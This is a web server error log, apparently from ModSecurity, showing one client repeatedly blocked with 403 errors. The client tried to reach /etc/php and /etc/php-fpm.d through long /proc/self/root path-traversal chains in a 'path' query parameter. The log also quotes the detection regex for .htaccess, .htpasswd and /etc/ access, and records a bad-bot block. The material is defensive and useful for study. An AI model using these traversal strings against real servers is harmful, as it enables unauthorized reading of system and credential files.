https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:41:54.680301 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:45414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJMew_le52K8_3pV2enQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:41:57.043285 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:45426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJNdY0UrI5A3LftIxPhQAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:41:58.418522 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:45434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJNkzinOy1jxa1j4fQYAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:41:59.369626 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.228.61:45288] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpJN9a6ubjKNq_cu4ZUigAAA04"]
[Wed Mar 18 03:41:59.699742 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:43376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJN-yqAr6etmhZHNp2twAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:02.270950 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:43382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJOdY0UrI5A3LftIxPhwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:42:06.841617 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:43392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJPuoXxyEfFpUF8f8rZwAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:09.505382 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:43404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJQUzinOy1jxa1j4fQZwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:42:12.023547 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:36812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJROyqAr6etmhZHNp2wgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:42:14.807682 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:36828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJRQkwaGbbGflqUZDRfgAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:42:18.897171 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:36844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJSvu8EFLIOrSqIpvFGgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:21.465277 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:52018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJTUzinOy1jxa1j4fQbAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:42:22.731088 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:52032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJTimAPhZkrhU8w4ksYwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:42:29.829495 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:52046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJVda6ubjKNq_cu4ZUtQAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:35.302295 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:50510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJW_u8EFLIOrSqIpvFKAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:37.629253 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:50512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJXdY0UrI5A3LftIxPoAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:42:38.950061 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:50522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJXta6ubjKNq_cu4ZUxgAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:47.787490 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:59950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJZ-yqAr6etmhZHNp29QAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:42:49.098648 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:59956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJaeyqAr6etmhZHNp29wAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:42:52.599299 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:47370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJbMdf6f5d65gmYZSO9QAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:42:54.971840 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:47384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJbuoXxyEfFpUF8f8rfgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:42:56.311078 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:47388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJcNa6ubjKNq_cu4ZUzwAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
